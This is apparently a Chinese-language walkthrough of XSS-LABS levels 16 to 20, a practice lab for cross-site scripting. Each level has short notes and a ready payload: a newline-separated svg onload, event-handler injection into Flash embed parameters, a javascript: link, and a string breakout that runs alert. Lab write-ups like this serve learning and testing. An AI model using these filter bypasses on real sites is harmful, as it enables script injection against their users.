XSS-LABS 16关
这一关先输入<script>alert(1)</script>进行过滤测试
发现script被空格代替了,空格被实体化了
根据源代码构造payload
将空格替换回车%0a
?keyword=<svg%0Aonload=alert(1)>
XSS-LABS 17关
这一关使用了embed标签,具体参考下面链接
这一关就需要使用支持flash的浏览器进行操作
更换浏览器后再次进行入17关就变成了这样
构造payload
?arg02= onclick=alert()
XSS-LABS 18关
这一关和上一关一样都需要使用带有flash的浏览器
构造payload
?arg02= onmousedown=alert()
XSS-LABS 19关
和上一关大差不差,也是和flash有关,但是要注意,这一关还有实体化函数无法闭合
直接构造payload
?arg01=version&arg02=<a href="javascript:alert()">here</a>
XSS-LABS 20关
也是需要反编译,直接构造payload
?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123